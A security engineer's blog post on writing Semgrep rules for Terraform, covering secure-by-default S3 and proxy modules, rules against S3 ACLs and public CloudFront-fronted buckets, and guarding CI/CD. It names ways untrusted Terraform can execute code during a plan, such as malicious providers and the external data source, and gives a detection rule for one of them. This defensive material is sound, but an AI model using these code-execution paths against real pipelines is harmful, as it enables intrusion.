Semgrep for Terraform Security

Apr 29, 24

Semgrep for Terraform Security

I’m a bit of a Semgrep fanboy

I remember when I first tried it out in my consultant days, it was such a relief to find a SAST tool that was fast, didn’t require building the code, was extensible, and came with a solid set of default rules. It quickly replaced language specific SAST tool like bandit and nodejsscan as it subsumed their rule sets.

I’m also an Infrastructure as Code fanboy

I started using Terraform seriously in 2019, around version 0.12. My first open source project, sadcloud, used Terraform to stand up (and tear down) insecure infrastructure. Having everything managed as code has made infrastructure security more practical, especially in a startup environment.

Semgrep is good for Terraform Security

Secure-by-default modules

One approach to killing bug classes in Terraform is to replace the overly flexible default modues with custom, secure-by-default ones.

Example 1: secure-bucket

S3 bucket leaks are the most common major AWS security incident. They’re so common, I’ve given up tracking them in my repository of aws-customer-security-incidents! In addition to making the bucket private (which is now the default 😌) , there are security optimizations around Encryption, Versioning, Block Public Access, and Logging.

It’s common for companies to have a wrapper module for all this configuration, to make it easy for engineers to get a bucket deployed without dozens of lines of non-DRY configuration.

Example 2: safe-proxy-access

Most companies build up a set of internal applications. Attackers have a history of using these as a foothold. A good first step is to not have them accessible publicly - often by putting them behind an identity aware proxy. This can take a fair bit of configuration (ALB, Cognito, Okta, etc.). By bundling this as a single module, it can be offered as a pluggable service.

Use Semgrep to evangelize secure-by-default modules

Okay, so you have a whole set of great modules, but you’ll still hit a roadblock: discovery!

How is that new employee going to know to use secure-bucket? I mean, yes it’s on page 13 of onboarding, but that was post lunch and they were a little sleepy.

Semgrep is great here! You just write a simple rule:

rules:
  - id: raw-s3-resource
    pattern: |
      resource "aws_s3_bucket" "$X" {
        ...
      }
    languages:
      - hcl
    severity: WARNING
    message: |
	    Hi! It looks like you're using a raw S3 resource. 
	    We recommend you instead use `secure-bucket`. 
	    Visit go/secure-bucket for details!

Then, you add that rule to your CI/CD checks, and developers will get a message on their PRs. This is a soft nudge that leaves room for deviation, while prodding people to the paved road!

Semgrep for opinonated rules

In addition to “nudges,” you can implement hard guardrails and invariants using Block mode.

This can also be used with Terraform to want to force explicit choices over use of implicit defaults. This can be helpful in highlighting critical configuration elements. For example, you want all Load Balancers to be explicitly “internal” or “external”:

rules:
  - id: lb-explicit-internal-external
    patterns:
      - pattern: |
          resource "aws_lb" "$Z" {
            ...
          }
      - pattern-not: |
          resource "aws_lb" "$X" {
            ...
            internal = $Y
            ...
          }
    languages:
      - hcl
    severity: ERROR
    message: You must explicitly set the `internal` argument to true or false.

Or you want to ban S3 ACLs (given they’re messy, and deprecated, and gross), just do:

rules:
  - id: s3-acls
    pattern-either:
      - pattern: |
          resource "aws_s3_bucket_acl" "$Z" {
            ...
          }
      - pattern: |
          resource "aws_s3_bucket" "$X" {
            ...
            acl = "$Y"
            ...
          }
    languages:
      - hcl
    severity: ERROR
    message: S3 ACLs are deprecated and may not be used. See go/s3-acls

Use Semgrep to secure your CI/CD

At a certain scale, you need to start applying your Terraform centrally, through an automated CI/CD system. Atlantis is the most popular open source offering. I’ve also used and enjoyed Spacelift, and of course there is always Terraform Cloud.

Applying TF via CI/CD offers improves security: developers no longer need privileged access locally, you can enforce code review, and you can run those CI/CD configuration scans!

But there is a major risk: running a terraform plan on untrusted code can lead to remote code execution.

Some ways an attacker can execute code if they can run a plan:

Import a malicious provider, which runs the payload on init
Use the external resource to run code directly
Or, you can do either indirectly by loading an external resource (module)

So, before running any Terraform commands, you can first use Semgrep to try (a brittle!) detection of these patterns. On any match, you could alert the security team, notify the user, or take whatever the appropriate steps are in your organization.

rules:
  - id: ban-external-provider
    pattern: |
        data "external" "$Z" {
          ...
        }
    languages:
      - hcl
    severity: ERROR
    message: The external provider is not allowed, as it can be used to execute code during TF plans

Of course, the same is possible (and maybe better) using OPA and conftest, but there are benefits to using Semgrep here:

the syntax is homogeneous with your other SAST
you can leverage the same integrations
you can run the exact same rules at PR time and pre-Plan to provide an improved developer experience

Write custom rules, catch subtle bugs

Shoehorning this in, because I love it. A lot of the current registry rules, as with any security tools, are mostly about “CIS Benchmark” misconfigurations - think: encryption or logging disabled. But SAST really delivery a flywheel of value when you take real findings and turn them into scalable rules.

Here’s one example of a confusing footgun I’ve seen go off:

It’s common to put Cloudfront in front of S3
By setting up either origin access identity (OAI) or origin access control (OAC), you can limit access to the bucket to only come from Cloudfront
If you do this with a private bucket, all the objects are now publicly accessible via Cloudfront unless you configure a signer, which then limits access to objects only to signed URLs
This is well marked (”Restrict View Access”) in the UI. But in Terraform, it’s easy to miss that this “toxic combination” of settings makes a bucket public.

So, we can write a Semgrep rule that checks for any aws_cloudfront_distribution that is fronting S3 (has s3_origin_config or origin_access_control_id ) but isn’t set up to require signing (has neither trusted_signers nor trusted_key_groups). Here’s a messy first pass:

rules:
  - id: public-s3-via-cloudfront
    patterns:
      - pattern-either:
        - pattern: |
            resource "aws_cloudfront_distribution" "$Z" {
              origin {
                ...
                s3_origin_config {
                  ...
                }
              }
              ...
            } 
        - pattern: |
            resource "aws_cloudfront_distribution" "$Z" {
              origin {
                ...
                origin_access_control_id = $W
              }
              ...
            } 
      - pattern-not: |
          resource "aws_cloudfront_distribution" "$X" {
            ...
            trusted_signers = $Y
            ...
          }
      - pattern-not: |
          resource "aws_cloudfront_distribution" "$X" {
            ...
            trusted_key_groups = $Y
            ...
          }
    languages:
      - hcl
    severity: WARNING
    message: |
     This will make the S3 bucket accessible publicly via Cloudfront. 
     Please either set up a signer or confirm all objects are public.

This is a case where there is a possible intentional business case for doing so, but misconfiguration is subtle enough and high enough risk to provide explicit in-line guidance to developers. If you’re using a secure-bucket pattern consistently, you could refine this rule further to detect reference to a bucket using the private bucket module.

Semgrep for Terraform Security

Alternatives for Terraform Security definitely exist. OPA and conftest were mentioned above, and checkov is also a frequent recommendation. Semgrep is easy to get started with, but check out these references and research for a broader survey on SAST for Terraform!

References

Gitlab - Fantastic Infrastructure as Code security attacks and how to find them
Marco Lancini - Semgrep for Cloud Security
Christophe Tafani-Dereeper - Shifting Cloud Security Left — Scanning Infrastructure as Code for Security Issues
Albert Heinle - The Current State of Infrastructure as Code (IaC) from a Security Standpoint
Frans van Buul - Everything-as-Code: Pushing the boundaries of SAST
Serhii Vasylenko — A Deep Dive Into Terraform Static Code Analysis Tools: Features and Comparisons

Research on SAST for Infrastructure as Code

Jan 2022: A Large-Scale Study on the Security Vulnerabilities of Cloud Deployments

Ran tfsec, terrascan and checkov against 8256 public repositories containing AWS TF, resulting in 292538 security violations
The most common issues found are Encryption, Access control, and Insecure defaults

Aug 2023: Exploring Security Practices in Infrastructure as Code: An Empirical Study

Ran checkov against 800 recently active projects that contain some Terraform code
“Our findings indicate that IaC configuration poses a major risk and confirm that, despite the availability of security scanning tools, there is a lack of adoption of best practices in open-source projects”

Nov 2023: Security Vulnerabilities in Infrastructure as Code: What, How Many, and Who?

Ran Snyk and Horusec against the source code of 7 IaC tools and that of over 1,600 Infrastructure as Code scripts and add-ons